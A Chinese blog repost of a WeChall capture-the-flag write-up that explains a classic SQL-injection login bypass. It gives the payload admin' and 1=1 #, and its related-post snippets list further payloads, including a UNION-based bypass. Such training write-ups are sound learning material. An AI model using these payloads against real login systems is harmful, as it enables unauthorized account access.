Training: MySQL I (MySQL, Exploit, Training)

最新推荐文章于 2025-09-11 20:53:34 发布

weixin_30835923

最新推荐文章于 2025-09-11 20:53:34 发布

阅读量144

点赞数

CC 4.0 BY-SA版权

文章标签：数据库 php

原文链接：http://www.cnblogs.com/dreamofus/p/5950844.html

本文介绍了一个简单的SQL注入案例，通过局部注释绕过密码验证实现登录。利用PHP的特性，通过构造特定的用户名字符串来忽略密码检查。

题目链接：http://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php?highlight=christmas

的确是非常简单的SQL注入

经过阅读源代码可知判断通过的方式是：

"SELECT * FROM users WHERE username='$username' AND password='$password'";

而且有admin这个用户的特判，利用php的局部注释“#”可以进行攻击：

username输入：admin' and 1=1 #

这里的代码将被翻译成:

username='admin' # and  password='$password'"

所以密码的验证将被忽略，可以作为admin登录

转载于:https://www.cnblogs.com/dreamofus/p/5950844.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30835923

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

2、深入探索Kali Linux：从入门到实践

nept的博客

08-17

本文深入介绍了Kali Linux操作系统的基础知识，涵盖从安装配置到实际操作的多个方面。内容包括Kali Linux的基本概念、启动与配置、菜单功能、文档资源、Linux文件系统导航、常用命令、文件查找方法、服务管理以及工具的安装与卸载。通过这些内容，用户可以全面了解Kali Linux的核心功能，为进行高级渗透测试和信息安全任务打下坚实基础。此外，还推荐了Kali Training网站的免费资源，帮助用户进一步提升技能。

『VulnHub系列』View2aKill: 1-Walkthrough

ins1ght的博客

12-09

1334

靶机发布日期：2019年10月29日，难度：中等。这篇博客在2019年11月21日就已经完成了，但是无奈某某办法出现了，所以里面关于CVE:2019-15814漏洞复现的地方删去了众多细节，请谅解！！！完成这个靶机的关键在于如何得到Sentrifugo系统的低权限账号的密码，其他的就是动动手~

参与评论您还未登录，请先登录后发表或查看评论

MySQL I (MySQL, Exploit, Training) 两种解法

hello world

03-01

322

分析题目已给判断登陆成功代码，第42行定义了查询语句。验证代码 $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; 方法一 username输入admin'#即可登录。原理：用Mysql单行注释符号#将后半句AND语句注释掉。 $query = "SELECT * FROM users WHERE username='admin'#' AND password='..

[WeChall] Training: MySQL I (MySQL, Exploit, Training)

weixin_30898109的博客

12-13

310

Training: MySQL I (MySQL, Exploit, Training) MySQL Authentication Bypass - The classic This one is the classic mysql injection challenge. Your mission is easy: Login yourself as admin. Again you are g...

MYSQL Training: MySQL I

Justesss的专栏

09-04

1136

让以admin身份登录，源码：很简单的注入在username输入 admin‘ OR ’1‘=’1 OK！

Wechall刷题（二） Training: MySQL I 总结

leeham的博客

08-15

1525

Training: MySQL I 总结题目题目总结分为四个部分解题思路及部分答案个人疑惑以及疑惑解答常见的SQL注入语句收获：通过本地模拟环境测试

WeChall Training部分

Howie‘s Blog

11-09

1638

我的WeChall之旅？？！Training: Get SourcedTraining: Stegano I (Training, Stegano)Training: Crypto - Caesar I (Crypto, Training)To be continued 记录以在wechall上完成的所有Challenges以便于以后学习查看，同时完成写blog的任务。 Training: Get...

Navicat Connecting to MySQL Database: A Security Audit Guide to Ensure无忧 Database Security

# 1. Database Security Auditing Overview Database security auditing is a process of regularly examining and analyzing database systems to identify and assess security risks, ensuring the security and...

219-6-3Google浏览器书签备份

qq_43046057的博客

06-03

3915

WAF 创建时间 2019-03-11 12:45:27 最后修改 2019-04-03 14:02:50>> 书签名称链接添加时间 WEB漏洞测试（二）——HTML注入 & XSS攻击 - 优快云博客 http://www.secsky.cn/216.html 2018-05-15 10:45:24 ModSecurity介绍 - 优快云博客...

Training: MySQL II (MySQL, Exploit, Training)

Howie‘s Blog

04-10

417

Training: MySQL II (MySQL, Exploit, Training) 题目描述 This one is the same as MySQL1, but you have to come up with a more advanced injection to trick this authentication. Your mission is again: Login yourself as admin. Again you are given the sourcecode, als

MySQL II (MySQL, Exploit, Training)简单解法

hello world

03-01

295

分析从代码可以看到username password分开来验证。通常的利用方法是使用union构造已知MD5值的查询。查询代码： $query = "SELECT * FROM users WHERE username='$username'"; username一栏填写123' union select 1,'admin',md5('password');# 构成sql语句： SELECT * FROM users WHERE username='123' union select

[Wechall]Training:MySQL

空心菜的博客

04-22

1491

绕过登录MySQL I:http://www.wechall.net/challenge/training/mysql/auth_bypass1/index.php 输入“admin’#”即可绕过，没有任何的字符过滤。账号密码一起的 :$query=”SELECT * FROM users WHERE username=’$username’ and password=’$password’”;绕

WeChall刷题（一）

leeham的博客

08-14

8368

2017.08.14这两天开始刷ctf的题目，首先看了i春秋上边的ctf入门视频，了解到很多刷题网站，分享如下： http://pwdme.cc/tag/idf%E5%AE%9E%E9%AA%8C%E5%AE%A4/ https://microcorruption.com/login http://smashthestack.org/ http://overthewire.org/warga

wechall MySQL Authentication Bypass II

weixin_30430169的博客

11-26

356

首先看看源码 username password分开来验证。但是没做过滤通常的利用方法是使用union构造已知MD5值的查询。如果username存在则执行查询，并且为admin。我们用unnion 这条语句把判断给pass掉即可。得出答案： ' union select 1,'admin' as username ,md5('1') as password from use...

Writeup For WeChall

segOt

03-09

2036

本文内容为WeChall网站中部分题目的解答，供学习、记录与分享。

为什么要显示调用析构函数